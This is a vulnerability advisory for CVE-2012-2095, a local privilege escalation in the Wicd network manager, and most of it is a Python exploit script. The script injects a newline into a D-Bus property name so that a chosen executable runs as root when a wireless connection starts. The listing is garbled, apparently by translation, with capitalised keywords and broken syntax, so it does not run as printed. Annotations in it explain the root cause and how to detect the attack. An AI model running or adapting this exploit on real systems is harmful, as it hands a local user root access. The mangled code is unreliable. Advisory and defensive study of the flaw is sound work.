Release date:
Updated on:
Affected Systems:
Wicd 1.7.1 ~ B3-4
Wicd 1.7.1 ~ B3-3
Wicd 1.5.9
Wicd 1.5.8
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52987
Cve id: CVE-2012-2095
Wicd is an open-source wired and wireless network manager for Linux.
Wicd has a local privilege escalation vulnerability caused by insufficient input validation in the 'SetWirelessProperty()' function. A local attacker with access to the daemon's D-Bus interface can exploit it to execute arbitrary code with superuser privileges.
<* Source: anonymous
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
Anonymous provides the following test method:
#! /Usr/bin/python
# Wicd 0day exploit discovered on 4.9.12 by InfoSec Institute student
# For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
Import sys
Import OS
Import time
Import getopt
Try: from wicd import dbusmanager
Failed T: print "[!] WICD Error: libraries are not available. Is WICD installed? "; Sys. exit (0)
# Exception type used throughout this script; it carries a human-readable
# message in errorStr, which main () prints before exiting.
Class Error (Exception ):
Def _ init _ (self, error ):
# Keep the message so callers can read it back as error. errorStr.
Self. errorStr = error
Def _ str _ (self ):
# String form is the repr () of the stored message.
Return repr (self. errorStr)
# Thin client for the Wicd daemon: connects through dbusmanager and keeps the
# "wireless" and "daemon" D-Bus interface objects plus the daemon's version.
Class Wicd ():
Wireless = None
Daemon = None
VersionString = None
Def _ init _ (self ):
# Any failure while connecting or looking up the interfaces is reported as
# Error ("Daemon is not running "), whatever the underlying cause was.
Try:
Dbusmanager. connect_to_manager ()
DbusInterfaces = dbusmanager. get_dbus_ifaces ()
Self. wireless = dbusInterfaces ["wireless"]
Self. daemon = dbusInterfaces ["daemon"]
Except t:
Raise Error ("Daemon is not running ")
# The version string is whatever the daemon's Hello () call returns.
Self. versionString = self. daemon. Hello ()
Def versionLessThan (self, version ):
# Strips the dots from the version string and compares it as an integer
# (main () passes 171). NOTE(review): the test is <=, not <, and a version
# string with a suffix such as the "1.7.1 ~ B3-4" builds listed in the
# advisory would presumably fail int () -- do not treat this as a reliable
# affected-version check; compare against the vendor's fixed release instead.
If int (self. versionString. replace (".", "") <= version:
Return True
Else:
Return False
# Proof-of-concept driver for the SetWirelessProperty () input-validation flaw
# described in the advisory (CVE-2012-2095). It only talks to the daemon through
# the "wireless" D-Bus interface held by the Wicd wrapper object.
#
# Defensive reading: the root cause is on the daemon side. The daemon accepts a
# caller-chosen property *name* without validating it, and that name ends up in
# the saved network settings. A fixed daemon has to reject property names and
# values containing line breaks and must not let callers set script-type
# properties through this method.
Class Exploit ():
Def _ init _ (self, wicd, scriptPath ):
# wicd: connected Wicd wrapper; scriptPath: value of the -- scriptPath option.
Self. wicd = wicd
Self. scriptPath = scriptPath
Def getNets (self ):
# Ask the daemon to scan until it reports at least one network, then yield
# each network index. NOTE(review): loops forever if no network is ever seen.
Self. wicd. wireless. Scan (True)
Nets = self. wicd. wireless. GetNumberOfNetworks ()
While nets <1:
Self. wicd. wireless. Scan (True)
Nets = self. wicd. wireless. GetNumberOfNetworks ()
For net in range (nets ):
Yield net
Def exploit (self ):
For net in self. getNets (): pass # Priming scan.
# The first string argument is the property name. Here it is not a plain key:
# it embeds a second key after a line break. This is the unvalidated input the
# advisory refers to; a daemon that checked the name would refuse this call.
Try:
Self. wicd. wireless. SetWirelessProperty (0, "beforescript =" + self. scriptPath + "\ nrooted", "true ")
Except t:
Raise Error ("Unable to exploit (SetWirelessProperty () failed .)")
# Persist the property for network 0 under the same crafted name.
# NOTE(review): the error text below repeats the SetWirelessProperty message
# although the failing call in this handler is SaveWirelessNetworkProperty.
Try:
Self. wicd. wireless. SaveWirelessNetworkProperty (0, "beforescript =" + self. scriptPath + "\ nrooted ")
Except t:
Raise Error ("Unable to exploit (SetWirelessProperty () failed .)")
# Remember an identifying property of network 0 so the same network can be
# found again after the configuration is reloaded and the list is re-scanned.
PropertyKey = 'bssid' # could be essid, or any other identifiable wireless property
VulnIdentifier = self. wicd. wireless. GetWirelessProperty (0, propertyKey)
# TODO: Does this need a try construct?
Self. wicd. wireless. ReloadConfig ()
# Connecting is the step after which, per usage (), the configured executable
# is expected to run as root. For detection, review saved network settings for
# script entries nobody configured, and watch for D-Bus calls to this method
# whose property name contains a line break.
For net in self. getNets (): # Implicit, but required re-scan.
If self. wicd. wireless. GetWirelessProperty (net, propertyKey) = vulnIdentifier:
Self. wicd. wireless. ConnectWireless (net)
Return True
Raise Error ("Unable to exploit (Lost the network we were using )")
# Print the command-line help: -h / -- help and the required -- scriptPath option.
Def usage ():
Print "[!] Usage :"
Print "(-h, -- help ):"
Print "Print this message ."
Print "(-- scriptPath =): Required, executable to run as root ."
Print "-- scriptPath =/some/path/to/executable. sh"
# Command-line entry point: parse options, connect to the daemon, warn when the
# reported version is above the expected range, then run the test.
# NOTE(review): every error path below exits with status 0, so a wrapper script
# cannot tell a failed run from a successful one by exit code.
Def main ():
Print "[$] WICD = <1.7.0Day"
Try:
Opts, args = getopt. getopt (sys. argv [1:], "h", ["help", "scriptPath ="])
Counter t getopt. GetoptError, err:
# Print help information and exit:
Print '[!] Parameter error: '+ str (err) # Will print something like "option-a not recognized"
Usage ()
Sys. exit (0)
ScriptPath = None
For opt, arg in opts:
If opt in ("-h", "-- help "):
Usage ()
Sys. exit (0)
Elif opt = "-- scriptPath ":
ScriptPath = arg
Else:
# It would be an assumption to say we'll never get here.
Print "[!] Parameter error ."
Usage ()
Sys. exit (0)
# -- scriptPath is mandatory; stop with the usage text when it is missing.
If not scriptPath:
Print "[!] Parameter error: scriptPath not set ."
Usage ()
Sys. exit (0)
# Connecting fails with Error when the daemon cannot be reached over D-Bus.
Try:
Wicd = Wicd ()
Failed T Error as error:
Print "[!] WICD Error: % s "% (error. errorStr)
Exit (0)
Print "[*] WICD Connection Initialized! (Version: % s) "% (wicd. versionString)
# The version test only produces a warning; the run continues either way, so
# the final message is not evidence that a given host is actually vulnerable.
If not wicd. versionLessThan (171 ):
Print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow ."
Exploit = Exploit (wicd, scriptPath)
Print "[*] Attempting to exploit :"
Try:
Exploit. exploit ()
Failed T Error as error:
Print "[!] Exploit Error: % s "% (error. errorStr)
Exit (0)
# Reached when exploit () returned without raising Error; nothing here checks
# that anything actually ran with elevated privileges.
Print "[*] Exploit appears to have worked ."
# Script entry point: run main () when the file is executed directly.
# NOTE(review): as printed on this page the listing is not valid Python
# (keywords are capitalised and dunder names are split by spaces).
If _ name __= = '_ main __':
Main ()
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Wicd
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://wicd.net/